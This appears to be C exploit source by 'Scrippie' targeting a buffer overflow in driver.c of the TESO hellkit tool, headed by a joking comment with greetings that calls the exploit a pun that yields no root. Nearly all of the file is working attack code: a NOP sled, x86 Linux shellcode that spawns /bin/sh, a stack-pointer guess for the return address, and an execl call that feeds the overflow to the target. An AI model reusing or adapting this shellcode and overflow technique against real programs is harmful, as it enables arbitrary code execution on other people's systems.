/*
   TESO crew their hellkit contains a silly buffer overflow in driver.c
   This exploit is obviously a pun. Mixter's shellgen.c got exploited
   by other people some time ago, so why not teso's hellkit :)

   Hellkit r0x btw ;)

   To all scriptkiddies: You won't get root from this, go and find something
                         more usefull.

   Shouts go out to:
            - Buffer0verfl0w Security
            - #phreak.nl
            - TESO (they do good work, and they probably know it)
            - Dethy, for locating the problem and being helpfull :)
            - #platform

   Lots of love goes to: Hester

   Cheers,
        Scrippie - ronald@grafix.nl
*/

#include <stdio.h>

#define NUMNOPS 970		/* Not exactly true, space is made for the
                                   shellcode */

char shellcode[] =
   "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
   "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
   "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp(void) {
   __asm__("movl %esp, %eax");
}


main(int argc, char **argv)
{
   char overflow[2000];		/* Bla bla, I suck too much memory */
   int i, offset=-2000;		/* Offset works on my box */
   long addr;

   if(argc>1) offset = atoi(argv[1]);

   for(i=0;i<NUMNOPS-sizeof(shellcode);i++) {
      overflow[i] = 0x90;
   }

   overflow[i] = 0x00;
   strcat(overflow, shellcode);
   addr = get_sp() - offset;

   printf("HellKit Overflow - Scrippie\n");
   printf("This is a pun - it's got no use\n");
   printf("Resulting address: 0x%x\n", addr);
   memcpy(overflow + strlen(overflow), (void *) &addr, 4);

   if((execl("./driver", "hackme", overflow, NULL)) == -1) {
      perror("execl()");
      exit(-1);
   }

   exit(0);
}